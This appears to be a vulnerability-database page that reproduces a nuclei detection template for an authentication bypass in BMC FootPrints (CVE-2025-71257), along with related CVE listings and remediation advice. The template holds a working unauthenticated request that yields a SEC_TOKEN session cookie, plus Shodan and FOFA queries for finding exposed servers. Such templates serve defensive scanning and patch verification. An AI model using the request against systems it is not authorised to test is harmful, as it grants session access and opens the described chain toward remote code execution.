Lucene search
K

BMC FootPrints - Authentication Bypass

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

BMC FootPrints authentication bypass lets unauthenticated users obtain a SEC_TOKEN via the password reset endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-71258
19 Mar 202613:44
attackerkb
ATTACKERKB
CVE-2025-71260
19 Mar 202613:45
attackerkb
ATTACKERKB
CVE-2025-71259
19 Mar 202613:44
attackerkb
ATTACKERKB
CVE-2025-71257
19 Mar 202613:43
attackerkb
Circl
CVE-2025-71257
18 Mar 202610:22
circl
Circl
CVE-2025-71258
18 Mar 202610:43
circl
Circl
CVE-2025-71259
18 Mar 202610:44
circl
Circl
CVE-2025-71260
18 Mar 202610:44
circl
CNNVD
BMC FootPrints 代码问题漏洞
19 Mar 202600:00
cnnvd
CNNVD
BMC FootPrints 代码问题漏洞
19 Mar 202600:00
cnnvd
Rows per page
id: CVE-2025-71257

info:
  name: BMC FootPrints - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: medium
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).
  impact: |
    Unauthenticated attackers can bypass access controls to access and modify application data and system resources.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-71257
    epss-score: 0.044
    epss-percentile: 0.90154
    cwe-id: CWE-287
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"/footprints/servicedesk/"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  tags: cve,cve2025,servicedesk,bmc-software,auth-bypass,footprints,bmc,vkev

variables:
  string: "{{to_lower(rand_base(8))}}"

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: set_cookie
        words:
          - "SEC_TOKEN="
# digest: 4a0a00473045022100901bfc3ddd62912155df3e7ea4098c8f2b2e2435c9c5ca666d1164740de3148302200ed1d66b71612249b7bf31f3f027b23ae761011ecc16f4d93aa40ce44b79aff4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Mar 2026 10:22Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.18.8 - 9.1
CVSS 48.7
EPSS0.3436
SSVC
10